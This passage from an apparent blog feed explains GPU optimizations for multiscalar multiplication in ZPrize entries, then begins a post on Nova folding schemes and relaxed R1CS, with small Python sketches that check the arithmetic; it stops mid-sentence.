&lt;p&gt;Denote the components of $W$ by $(B_{0}, \dots, B_{2^b-1})$. Then&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\begin{aligned}&lt;br &#x2F;&gt;
\hat W_{0} &amp;amp;:= (\sum_{i=0}^{2^{k}-1}B_{i2^k}, \sum_{i=0}^{2^{k}-1}B_{i2^k+1},\dots,\sum_{i=0}^{2^{k}-1}B_{i2^k+2^{k}-1}), \\&lt;br &#x2F;&gt;
\hat W_{1} &amp;amp;:= (\sum_{i=0}^{2^{k}-1}B_{i}, \sum_{i=0}^{2^{k}-1}B_{i + 2^k},\dots,\sum_{i=0}^{2^{k}-1}B_{i + (2^{k}-1)2^{k}})&lt;br &#x2F;&gt;
\end{aligned}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;h4 id=&quot;case-b-odd&quot;&gt;Case $b$ odd:&lt;&#x2F;h4&gt;
&lt;p&gt;Let us write $b = 2k-1$. This case is similar to the above. As before, let $W$ be a $b$-bit window. The definition of $\hat W_0$ and $\hat W_1$ follows the same logic as before.&lt;br &#x2F;&gt;
But there is a catch. If $r$ is such that $0\leq r &amp;lt; 2^b$ and we write $r= a + c2^k$ with $0\leq a,c &amp;lt; 2^k$, then $c$ is necessarily less than $2^{k-1}$. And so the second half of the coordinates of $\hat W_{1}$ will be empty, because none of the buckets $B_r$ of $W$ is assigned to those coordinates. We obtain&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\begin{aligned}&lt;br &#x2F;&gt;
\hat W_{0} &amp;amp;:= (\sum_{i=0}^{2^{k-1}-1}B_{i2^k}, \sum_{i=0}^{2^{k-1}-1}B_{i2^k+1},\dots,\sum_{i=0}^{2^{k-1}-1}B_{i2^k+2^{k}-1}), \\&lt;br &#x2F;&gt;
\hat W_{1} &amp;amp;:= (\sum_{i=0}^{2^{k}-1}B_{i}, \sum_{i=0}^{2^{k}-1}B_{i + 2^k},\dots,\sum_{i=0}^{2^{k}-1}B_{i + (2^{k-1}-1)2^{k}}, \mathcal O,\dots, \mathcal O).&lt;br &#x2F;&gt;
\end{aligned}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;In the above definition, there are $2^{k-1}$ coordinates with entry $\mathcal O$, the point at infinity.&lt;&#x2F;p&gt;
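&lt;p&gt;A small Python sketch (ours, with integers in place of EC points) of the splitting rule, covering both parities of $b$ and checking the identity $P_W = P_{\hat W_0} + 2^{\lceil b&#x2F;2\rceil}P_{\hat W_1}$:&lt;&#x2F;p&gt;

```python
import random

def split_window(W, b):
    """Split a b-bit window: bucket B_r with r = a + c*2^k contributes to
    component a of W0 and component c of W1, where k = ceil(b/2)."""
    k = (b + 1) // 2
    W0, W1 = [0] * (1 << k), [0] * (1 << k)
    for r, B in enumerate(W):
        a, c = r % (1 << k), r >> k
        W0[a] += B
        W1[c] += B   # for odd b, the top 2^(k-1) components of W1 stay zero
    return W0, W1

def window_point(W):
    return sum(i * B for i, B in enumerate(W))

random.seed(0)
for b in (4, 5):                       # one even and one odd case
    W = [random.randrange(100) for _ in range(1 << b)]
    k = (b + 1) // 2
    W0, W1 = split_window(W, b)
    assert window_point(W) == window_point(W0) + (1 << k) * window_point(W1)
```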
&lt;h3 id=&quot;reduction-of-window-configurations-and-coefficient-shifts&quot;&gt;Reduction of window configurations and coefficient shifts&lt;&#x2F;h3&gt;
&lt;p&gt;Performing the above process on every window of a configuration $C$ we obtain a new configuration $D$ of the desired shape. We will not always have $P_C = P_D$.&lt;&#x2F;p&gt;
&lt;p&gt;Let $C=(W_0, W_1, \dots, W_{m-1})$ be a window configuration of shape $(m, b)$. For every window $W_i$, let $\hat W_{2i}$ and $\hat W_{2i+1}$ be the two $\lceil b&#x2F;2 \rceil$-bit windows obtained from splitting $W_i$. Let $D=(\hat W_0, \hat W_1, \dots, \hat W_{2m-1})$. This is a window configuration of shape $(2m, \lceil b&#x2F;2 \rceil)$.&lt;&#x2F;p&gt;
&lt;p&gt;If $b$ is even, then it is easy to see that $P_C = P_D$.&lt;&#x2F;p&gt;
&lt;p&gt;If $b$ is odd, then $P_C$ is, in general, different from $P_D$. For example, the first two terms of $P_C$ are $P_{W_0} + 2^bP_{W_1}$. On the other hand, the first four terms of $P_D$ are $P_{\hat W_0} + 2^k P_{\hat W_1} + 2^{2k}P_{\hat W_2} + 2^{3k}P_{\hat W_3}$, where $k = \lceil b&#x2F;2 \rceil$. This is equal to $P_{W_0} + 2^{2k} P_{W_1} = P_{W_0} + 2^{b+1}P_{W_1}$. And so the coefficient of $P_{W_1}$ in $P_D$ has an extra factor of $2$.&lt;&#x2F;p&gt;
&lt;p&gt;Nevertheless, $P_C$ is equal to&lt;&#x2F;p&gt;
&lt;p&gt;$$P_{\hat W_0} + 2^{k-f_1}P_{\hat W_1} + 2^{2k-f_2}P_{\hat W_2} + \cdots + 2^{(2m-1)k-f_{2m-1}}P_{\hat W_{2m-1}},$$&lt;br &#x2F;&gt;
where $f_i = \lfloor i&#x2F;2\rfloor$. We call these the coefficient shifts.&lt;&#x2F;p&gt;
&lt;p&gt;In general, we can define $f_i$ to be $0$ for all $i$ if $b$ is even and $f_i = \lfloor i&#x2F;2 \rfloor$ for all $i$ if $b$ is odd.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;algorithm&quot;&gt;Algorithm&lt;&#x2F;h3&gt;
&lt;p&gt;We start with a window configuration $C_0$ of shape $(m, b) = (3, 23)$. Inductively, for every $i$ we perform the reduction step on $C_i$ to obtain a new window configuration $C_{i+1}$ and also accumulate the coefficient shifts. After $5$ steps we obtain $C_5$ of shape $(96, 1)$ and the accumulated coefficient shifts $f_i$.&lt;&#x2F;p&gt;
&lt;p&gt;From $C_5$ and the $f_i$ we can compute $P_{C_0}$.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;parallelization-strategy-2&quot;&gt;Parallelization strategy&lt;&#x2F;h3&gt;
&lt;p&gt;When splitting a window configuration of shape $(m, b)$ into one of shape $(2m, k)$, where $k=\lceil b&#x2F;2\rceil$, each new bucket is a sum of $2^k$ elements (or $2^{k-1}$ in some cases when $b$ is odd). To compute these, the following kernels are launched.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. First a kernel with $2m2^{k+l}$ threads for some $l \leq \lfloor b&#x2F;2 \rfloor$ is launched. The $2^k$ terms of the sum of each new bucket are split into $2^{l}$ even groups. Each thread then computes the sum of the terms in a group. These partial sums are computed sequentially.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. A second kernel with $2m2^{k}$ threads is launched. Each thread is in charge of a bucket. It uses a binary reduction algorithm to compute it by adding the $2^l$ partial sums obtained by the previous kernel.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;yrrid&quot;&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;z-prize&#x2F;2022-entries&#x2F;tree&#x2F;main&#x2F;open-division&#x2F;prize1-msm&#x2F;prize1a-msm-gpu&#x2F;yrrid&quot;&gt;Yrrid&lt;&#x2F;a&gt;&lt;&#x2F;h2&gt;
&lt;p&gt;This solution precomputes $2^{2\cdot23j}P_i$ for each input point $P_i$ and $j=0,\dots,5$. These are all points on the EC. We can rewrite the first sum in this way:&lt;&#x2F;p&gt;
&lt;p&gt;$$ \sum_{i=1}^n \sum_{j=0}^5 k_{ij}2^{2\cdot23j} P_i$$&lt;&#x2F;p&gt;
&lt;p&gt;where each $k_{ij}&amp;lt;2^{2\cdot23}$.&lt;&#x2F;p&gt;
&lt;p&gt;Since each $2^{46j}P_i$ belongs to the EC and is already computed we can rewrite the sum as $\sum_{m=1}^{6n}k_m P_m$ (for other $k$s and other $P$s) where each $k_{m}&amp;lt;2^{46}$. This allows us to&lt;br &#x2F;&gt;
split each $k_m$ into two 23-bit windows for Pippenger’s algorithm.&lt;&#x2F;p&gt;
&lt;p&gt;Another optimization the algorithm uses is the following: the window value has a sign bit and a 22-bit scalar value. If the scalar is large, we can negate the point and change the scalar to $s’=m - s$, where $m$ is the group order. The new scalar, $s’$, will have its high bit clear. This works since $s’(-P_i) = (m - s)(-P_i) = (s - m)P_i = sP_i$, because $mP_i = \mathcal O$.&lt;&#x2F;p&gt;
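&lt;p&gt;This trick can be checked over a toy additive group $\mathbb{Z}_m$ (a sketch of ours, not Yrrid’s code): $sP$ equals $(m-s)(-P)$, so a scalar with its high bit set can be traded for a small scalar on the negated point.&lt;&#x2F;p&gt;

```python
# Sketch: "points" live in Z_m written additively, so scalar multiplication
# is ordinary multiplication mod m.

m = 97                 # stand-in for the group order
P = 13                 # stand-in for a point
s = 90                 # a "large" scalar (high bits set)

s_neg = m - s          # 7, much smaller: high bits are now clear
assert (s * P) % m == (s_neg * (-P)) % m
```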
&lt;p&gt;The buckets are then sorted, such that the buckets with the most points are run first. This allows the GPU warps to run convergent workloads and minimizes the tail effect. This solution writes custom algorithms to achieve bucket sorting instead of using the CUB libraries.&lt;&#x2F;p&gt;
&lt;p&gt;The bucket sums are computed in parallel (assigning a thread to each bucket) using the XYZZ EC representation. The operations for this curve representation can be found &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;hyperelliptic.org&#x2F;EFD&#x2F;g1p&#x2F;auto-shortw-xyzz.html#addition-add-2008-s&quot;&gt;here&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;The FF and EC routines have been optimized:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Based on Montgomery&amp;#39;s multiplication&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Minimize correction steps in the FF operations&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Use an XYZZ representation for the EC point accumulators&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Use fast squaring&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;Multiscalar multiplication (MSM) is one of the key operations in many proving systems, such as Marlin or Plonk with Kate polynomial commitment schemes. Owing to the nature of the operation, we can leverage GPUs to reduce its calculation time. The ZPrize competition sought to improve the current baseline of 5.86 seconds for an MSM with \( 2^{26} \) points for the BLS12-377 curve. There were 6 different proposals, each with its unique features, based on Pippenger’s algorithm: optimizing window size, precomputation of some points (trading memory for speed), different coordinate systems for elliptic curve addition, endomorphisms, parallel reduction algorithms, point negation, non-adjacent form for integers, better finite field arithmetic. The best solutions achieved 2.52 seconds (2.3x speedup), but we think there is still more room for further optimization. Will we get below 1 second? Maybe you have the answer…&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Incrementally verifiable computation: NOVA</title>
          <pubDate>Fri, 20 Jan 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/incrementally-verifiable-computation-nova/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/incrementally-verifiable-computation-nova/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/incrementally-verifiable-computation-nova/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;One of the current goals is to realize, in an efficient way, incrementally verifiable computation (IVC). This cryptographic primitive allows a given party to show the integrity of a given computer program’s execution by providing proof that the result of each step is correct and that all previous ones have been appropriately executed. More precisely, at step \( N \) we apply a function \( F_N \) that updates the state, taking as inputs the current state \( x_N \) and a proof \( \pi_{N-1} \) asserting the correct execution of steps \( 1,2,…,N-1 \), and outputting the new state \( x_{N+1} \) and a proof \( \pi_N \) of its correct execution. IVC has many applications, such as allowing decentralized private computation (DPC), where you can delegate the execution of your programs to untrusted third parties, succinct blockchains, and verifiable delay functions.&lt;&#x2F;p&gt;
&lt;p&gt;In a previous post, we discussed the problem of DPC and two protocols related to it, &lt;a href=&quot;&#x2F;decentralized-private-computations-zexe-and-veri-zexe&#x2F;&quot;&gt;ZEXE and VERI-ZEXE&lt;&#x2F;a&gt;. ZEXE discussed the possibility of using proof-carrying data (PCD) to be able to verify arbitrary computations, but this can be pretty expensive computationally since, at each step, we need to verify the proof of the previous step, for which we need to:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Compute expensive bilinear pairing operations.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Include the arithmetic circuit of the verifier into our program, which is not a lightweight construction.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;VERI-ZEXE leveraged accumulation schemes (AS) to provide IVC. The key idea is to delay the final proof to the ledger’s validators (where we will need to compute the expensive pairing operation). At each step of the computation, the proof \( \pi_{N-1} \) is “added” to an accumulator, which is then partially verified: the prover checks that the result of the accumulation is correct, but does not compute pairing operations. We mask the group elements in the accumulator using a randomizer to ensure zero knowledge.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2021&#x2F;370.pdf&quot;&gt;Nova&lt;&#x2F;a&gt; is a new protocol proposing an alternative to realizing IVC with lightweight construction. Instead of using &lt;a href=&quot;&#x2F;the-hunting-of-the-zk-snark&#x2F;&quot;&gt;zk-SNARKs&lt;&#x2F;a&gt;, they take advantage of folding schemes, accumulating NP instances instead of SNARKs. The authors claim it results in a weaker, simpler, and more efficient scheme than those relying on succinct arguments of knowledge:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The verifier circuit is constant in size and dominated by two group scalar multiplications.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The prover&amp;#39;s work is dominated by two multiexponentiations.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The key point is that the folding acts as a deferral of proof verification until the last point: to check the correct application of \( N \) times a given function, we only need to check the folded proof for the \( N \) steps.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;folding-schemes&quot;&gt;Folding schemes&lt;&#x2F;h2&gt;
&lt;p&gt;A folding scheme is a protocol between an untrusted prover and a verifier. Each of them has an \( N \)-sized NP instance, and the prover has, in addition, witnesses for both instances (recall that in the context of zk-SNARKs we call the secret inputs the witness). The protocol enables them to output a single \( N \)-sized NP instance, known as the folded instance. The folding scheme guarantees that the folded instance is satisfiable only if the original instances are valid. We call the scheme non-trivial if the verifier’s work and communication are less than they would be without the folding scheme. The folding scheme thus reduces the satisfiability of two NP instances to that of just one. Some techniques exhibiting this two-to-one reduction are sum-check protocols, batch proving, and bulletproofs. To realize such a construction, we have to introduce relaxed (quadratic) rank-one constraint systems (relaxed R1CS).&lt;&#x2F;p&gt;
&lt;h2 id=&quot;r1cs-and-relaxed-r1cs&quot;&gt;R1CS and relaxed R1CS&lt;&#x2F;h2&gt;
&lt;p&gt;We saw that the correct execution of a given code could be expressed as a &lt;a href=&quot;&#x2F;how-to-transform-code-into-arithmetic-circuits&#x2F;&quot;&gt;circuit satisfiability problem&lt;&#x2F;a&gt;. Circuits are equivalent to R1CS, which are systems of equations of the form:&lt;br &#x2F;&gt;
\[ Az \times Bz = Cz \]&lt;br &#x2F;&gt;
where \( A,B,C \) are sparse matrices and \( \times \) denotes component-wise product. It is quadratic because each variable in each equation has at most degree two (we can have \( z_1^2 \) but not \( z_1^4 \)). Even though R1CS are a convenient way to express circuits, they are not fully compatible with folding schemes; in other words, it is not easy to build a folding scheme on top of R1CS.&lt;&#x2F;p&gt;
&lt;p&gt;Nova works by taking incremental computations, where each step is expressed as an R1CS; the constraint system is augmented with the verification circuit, which has to assert the correctness of the execution of the previous step. However, instead of verifying the proof \( \pi_{N-1} \), Nova treats it as an instance of R1CS and folds it into a running relaxed R1CS.&lt;&#x2F;p&gt;
&lt;p&gt;A relaxed R1CS introduces an error, \( E \), and a scalar, \( u \), such that&lt;br &#x2F;&gt;
\[ Az \times Bz = uCz+E \]&lt;br &#x2F;&gt;
Note that any R1CS is also a relaxed R1CS, where \( E \) is the zero vector and \( u=1\). Relaxed R1CS retains the property that it is NP-complete, which means that we can reduce any NP problem to it.&lt;&#x2F;p&gt;
&lt;p&gt;We want the folding scheme to merge two instances of R1CS with the same matrices \( A, B, C \) into a single one. Each R1CS has its corresponding instance-witness pairs (that is, public and private data), \( z_i=(w_i,x_i) \), and we want to create a new \( z=(w,x) \) satisfying the R1CS system of equations with \( A, B, C \), such that this also implies that each \( z_i=(w_i,x_i) \) does so. One way to do this is by having the verifier select a random \( r \) and perform the following transformation:&lt;br &#x2F;&gt;
\[ z=z_1+rz_2 \]&lt;br &#x2F;&gt;
This transformation would suffice for linear systems of equations, but since the R1CS is nonlinear, we cannot apply this simple strategy. If we substitute this into the R1CS, we get&lt;br &#x2F;&gt;
\[ Az_1\times Bz_1+r(Az_1 \times Bz_2 +Az_2\times Bz_1)+r^2(Az_2\times Bz_2) = Cz_1+rCz_2 \]&lt;&#x2F;p&gt;
&lt;p&gt;In the relaxed R1CS, the error term \( E \) will absorb all the cross-terms generated by introducing the linear combination, and \( u \) will take the extra \( r \) term on the right-hand side. To do so,&lt;br &#x2F;&gt;
\[ u=u_1+ru_2 \]&lt;br &#x2F;&gt;
\[ E=E_1+r(Az_1\times Bz_2+Az_2\times Bz_1-u_1Cz_2-u_2Cz_1)+r^2E_2\]&lt;br &#x2F;&gt;
and both \( u,E \) are added to the instance-witness pair. The main problem is that the prover would have to send the witnesses \( w_1,w_2 \) to the verifier so that he can compute \( E \). To avoid this, we treat both \( E \) and \( w \) as witnesses and hide them using polynomial commitment schemes.&lt;&#x2F;p&gt;
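&lt;p&gt;The folding arithmetic can be checked on a toy example (a sketch of ours, with the commitments omitted): folding two satisfying relaxed R1CS pairs with the cross term \( T \) yields a pair that again satisfies \( Az\times Bz = uCz+E \).&lt;&#x2F;p&gt;

```python
# Sketch: fold two relaxed R1CS instance-witness pairs (z_i, u_i, E_i)
# over Z_p and verify the folded pair still satisfies the relaxed equation.

p = 101
A = [[0, 1, 0]]; B = [[0, 1, 0]]; C = [[0, 0, 1]]   # encodes x * x = y

def mat_vec(M, v):
    return [sum(m * x for m, x in zip(row, v)) % p for row in M]

def satisfied(z, u, E):
    Az, Bz, Cz = mat_vec(A, z), mat_vec(B, z), mat_vec(C, z)
    return all((a * b) % p == (u * c + e) % p
               for a, b, c, e in zip(Az, Bz, Cz, E))

# Two plain R1CS instances (u = 1, E = 0): 3^2 = 9 and 4^2 = 16.
z1, u1, E1 = [1, 3, 9], 1, [0]
z2, u2, E2 = [1, 4, 16], 1, [0]
assert satisfied(z1, u1, E1) and satisfied(z2, u2, E2)

r = 7  # verifier's random challenge

Az1, Bz1, Cz1 = mat_vec(A, z1), mat_vec(B, z1), mat_vec(C, z1)
Az2, Bz2, Cz2 = mat_vec(A, z2), mat_vec(B, z2), mat_vec(C, z2)
T = [(a1 * b2 + a2 * b1 - u1 * c2 - u2 * c1) % p
     for a1, b1, c1, a2, b2, c2 in zip(Az1, Bz1, Cz1, Az2, Bz2, Cz2)]

z = [(x1 + r * x2) % p for x1, x2 in zip(z1, z2)]   # z = z1 + r z2
u = (u1 + r * u2) % p                               # u = u1 + r u2
E = [(e1 + r * t + r * r * e2) % p                  # E = E1 + rT + r^2 E2
     for e1, t, e2 in zip(E1, T, E2)]
assert satisfied(z, u, E)
```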
&lt;h2 id=&quot;polynomial-commitment-scheme&quot;&gt;Polynomial commitment scheme&lt;&#x2F;h2&gt;
&lt;p&gt;Nova uses an inner product argument (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;dankradfeist.de&#x2F;ethereum&#x2F;2021&#x2F;07&#x2F;27&#x2F;inner-product-arguments.html&quot;&gt;IPA&lt;&#x2F;a&gt;), which relies on Pedersen commitments. These are based on the assumption that the discrete log is hard to solve and do not require a trusted setup. IPA differs from other popular commitment schemes, such as KZG, which relies on elliptic curve pairings and needs a trusted setup. Regarding proof sizes and verification times, KZG is better since IPA with Pedersen commitments requires linear work from the verifier, with proof size depending on the input (KZG’s proof and verification time are constant). However, we can work around these weaknesses in systems such as Halo.&lt;&#x2F;p&gt;
&lt;p&gt;The lightweight construction of the verifier is tied to the polynomial commitment scheme. In this case, the highest cost is two &lt;a href=&quot;&#x2F;need-for-speed-elliptic-curves-chapter&#x2F;&quot;&gt;group scalar multiplications &lt;&#x2F;a&gt;. Nova’s verifier circuit is around 20,000 constraints.&lt;&#x2F;p&gt;
&lt;p&gt;The fundamental property that the polynomial commitment scheme must satisfy is that it is additively homomorphic: given two variables \( a, b \), we say that the commitment is additively-homomorphic if \( \mathrm{cm}(a+b)=\mathrm{cm}(a)+\mathrm{cm}(b) \), where \( \mathrm{cm}(x) \) is the commitment of \( x \). Both KZG and Pedersen’s commitments fulfill this property. Using this, both the verifier’s communication and work are constant.&lt;&#x2F;p&gt;
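&lt;p&gt;A toy sketch of this property for a Pedersen-style commitment written multiplicatively (our illustration with insecure parameters, not a real instantiation): the commitment to \( a+b \) is the product of the commitments, with the randomness also adding.&lt;&#x2F;p&gt;

```python
# Sketch: cm(m; r) = g^m * h^r in the multiplicative group mod p, so
# cm(a; r1) * cm(b; r2) = cm(a + b; r1 + r2).

p = 1019          # toy prime, far too small to be secure
g, h = 2, 3       # toy bases (assumed independent)

def commit(m, r):
    return (pow(g, m, p) * pow(h, r, p)) % p

a, ra = 15, 4
b, rb = 27, 9
assert (commit(a, ra) * commit(b, rb)) % p == commit(a + b, ra + rb)
```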
&lt;p&gt;The other necessary property is succinctness: the commitment size must be logarithmic in the opening size. For example, if we have a degree \( n \) polynomial, its commitment should take at most \( \log(n) \) elements.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;folding-scheme-for-committed-relaxed-r1cs&quot;&gt;Folding scheme for committed relaxed R1CS&lt;&#x2F;h2&gt;
&lt;p&gt;An instance (that is, the public variables) for a committed relaxed R1CS is given by \( x \), the public input and output variables, \( u \) and the commitments to \( E \), \( \mathrm{cm}(E) \) and \( \mathrm{cm}(w) \). We can group these in the tuple \( (x,\mathrm{cm}(w),\mathrm{cm}(E),u)\). The instance is satisfied by a witness (secret variables) \( (E,r_E,w,r_w)\) if \( \mathrm{cm}(E)=\mathrm{Commit}(E,r_E)\), \( \mathrm{cm}(w)=\mathrm{Commit}(w,r_w)\) and \( Az\times Bz = uCz+E \), where \( z=(w,x,u) \). In simple words, the witness satisfies the instance if the public variables \( \mathrm{cm}(E) \) and \( \mathrm{cm}(w) \) are indeed the commitments to the private variables \( E,w \) using randomness \( r_E,r_w \), respectively and they fulfill the relaxed R1CS equations.&lt;&#x2F;p&gt;
&lt;p&gt;The prover and verifier have access to two instances of relaxed R1CS, \( (x_1,\mathrm{cm}(w_1),\mathrm{cm}(E_1),u_1)\) and \( (x_2,\mathrm{cm}(w_2),\mathrm{cm}(E_2),u_2)\). In addition, the prover has \( (E_1,r_{E1},w_1,r_{w1})\) and \( (E_2,r_{E2},w_2,r_{w2})\). The protocol proceeds as follows:&lt;&#x2F;p&gt;
&lt;p&gt;1. The prover computes \( T=Az_1\times Bz_2+Az_2\times Bz_1-u_1Cz_2-u_2Cz_1\) and sends the commitment to it, \( \mathrm{cm}(T)=\mathrm{Commit}(T,r_T) \).&lt;br &#x2F;&gt;
2. The verifier samples the random challenge, \( r \).&lt;br &#x2F;&gt;
3. The prover and verifier output the folded instance,&lt;br &#x2F;&gt;
\( \mathrm{cm}(E)=\mathrm{cm}(E_1)+r^2\mathrm{cm}(E_2)+r\mathrm{cm}(T) \)&lt;br &#x2F;&gt;
\( u=u_1+ru_2 \)&lt;br &#x2F;&gt;
\( \mathrm{cm}(w)=\mathrm{cm}(w_1)+r\mathrm{cm}(w_2) \)&lt;br &#x2F;&gt;
\( x=x_1+rx_2 \)&lt;br &#x2F;&gt;
4. The prover updates the witness&lt;br &#x2F;&gt;
\( E=E_1+rT+r^2E_2 \)&lt;br &#x2F;&gt;
\( r_E=r_{E1}+rr_T+r^2r_{E2} \)&lt;br &#x2F;&gt;
\( w=w_1+r w_2 \)&lt;br &#x2F;&gt;
\( r_w=r_{w1}+rr_{w2} \)&lt;&#x2F;p&gt;
&lt;p&gt;The protocol can be made non-interactive by using the Fiat-Shamir transformation.&lt;&#x2F;p&gt;
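&lt;p&gt;The folding arithmetic above can be checked on a toy example. The following sketch is a hypothetical illustration (commitments omitted, and a small prime standing in for a cryptographic field): it folds two satisfying relaxed R1CS instances for the single constraint \( z_a\cdot z_b=z_c \) and verifies that the folded instance still satisfies \( Az\times Bz=uCz+E \):&lt;&#x2F;p&gt;

```python
# Toy Nova-style folding of two relaxed R1CS instances (hypothetical sketch).
P = 97  # small prime standing in for a cryptographic field

# R1CS for the single constraint z_a * z_b = z_c, with z = (1, z_a, z_b, z_c)
A = [[0, 1, 0, 0]]
B = [[0, 0, 1, 0]]
C = [[0, 0, 0, 1]]

def matvec(M, z):
    # Matrix-vector product over the toy field
    return [sum(m * zi for m, zi in zip(row, z)) % P for row in M]

def check(z, u, E):
    # Relaxed R1CS: Az x Bz = u*Cz + E (componentwise, mod P)
    Az, Bz, Cz = matvec(A, z), matvec(B, z), matvec(C, z)
    return all((a * b) % P == (u * c + e) % P for a, b, c, e in zip(Az, Bz, Cz, E))

def fold(z1, u1, E1, z2, u2, E2, r):
    # Cross term T = Az1 x Bz2 + Az2 x Bz1 - u1*Cz2 - u2*Cz1
    Az1, Bz1, Cz1 = matvec(A, z1), matvec(B, z1), matvec(C, z1)
    Az2, Bz2, Cz2 = matvec(A, z2), matvec(B, z2), matvec(C, z2)
    T = [(a1 * b2 + a2 * b1 - u1 * c2 - u2 * c1) % P
         for a1, b1, c1, a2, b2, c2 in zip(Az1, Bz1, Cz1, Az2, Bz2, Cz2)]
    z = [(x + r * y) % P for x, y in zip(z1, z2)]   # z = z1 + r*z2
    u = (u1 + r * u2) % P                           # u = u1 + r*u2
    E = [(e1 + r * t + r * r * e2) % P for e1, t, e2 in zip(E1, T, E2)]
    return z, u, E
```

&lt;p&gt;Note how the cross term \( T \) absorbs exactly the mixed products introduced by the random linear combination; this is why plain R1CS cannot be folded but relaxed R1CS can.&lt;&#x2F;p&gt;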
&lt;p&gt;Using this strategy, we can realize IVC by successively updating the parameters after folding. The prover can then use a zk-SNARK showing that he knows the valid witness \( (E,r_E,w,r_w) \) for the committed relaxed R1CS in zero knowledge, that is, without revealing its value.&lt;&#x2F;p&gt;
&lt;p&gt;The problem with using some common SNARKs is that the prover must show that he knows valid vectors whose commitments equal given values. This implies encoding a linear number of group scalar multiplications in the SNARK’s model. Therefore, we need a new construction to deal with this problem.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;polynomial-interactive-oracle-proof-piop&quot;&gt;Polynomial interactive oracle proof (PIOP)&lt;&#x2F;h2&gt;
&lt;p&gt;The PIOP is a modified version of Spartan. It is based on the sum-check protocol and multilinear polynomials. For a given function mapping bitstrings to field elements, \( f:{0,1}^n \rightarrow \mathbb{F}\), we say that \( p:\mathbb{F}^n \rightarrow \mathbb{F} \) is a polynomial extension of \( f \) if it is a low-degree polynomial satisfying \( f(x)=p(x) \) for all \( x \) in \( {0,1}^n \). We call the extension multilinear if \( p \) is a multilinear polynomial such that \( f(x)=p(x) \). Multilinear polynomials are polynomials in several variables, such that the degree of each variable is at most 1 in every term. For example, \( p(x_1,x_2,x_3)=x_1+x_1x_2x_3+x_2x_3 \) is multilinear (in each term, we have at most \( x_i \)), but \( p(x_1,x_2)=x_1^2x_2 \) is not.&lt;&#x2F;p&gt;
&lt;p&gt;The R1CS matrices, \( A,B,C \), can be thought of as functions from \( {0,1}^m \times {0,1}^m\) to some finite field \( \mathbb{F}_p \) in a natural way. Therefore, we can also make multilinear extensions of them, \( A_{ML}, B_{ML}, C_{ML} \), that is, multilinear polynomials in \( 2\log(m) \) variables. Since the R1CS matrices are sparse, the corresponding multilinear polynomials are sparse (in simple words, they have few non-zero coefficients). The vectors \( E \) and \( w \) can also be interpreted as polynomials, \( E_{ML} \) and \( w_{ML} \). The vectors \( z=(w,x,u) \) and \( y=(x,u) \) also have their multilinear extensions \(z_{ML},y_{ML} \). We have the following function,&lt;br &#x2F;&gt;
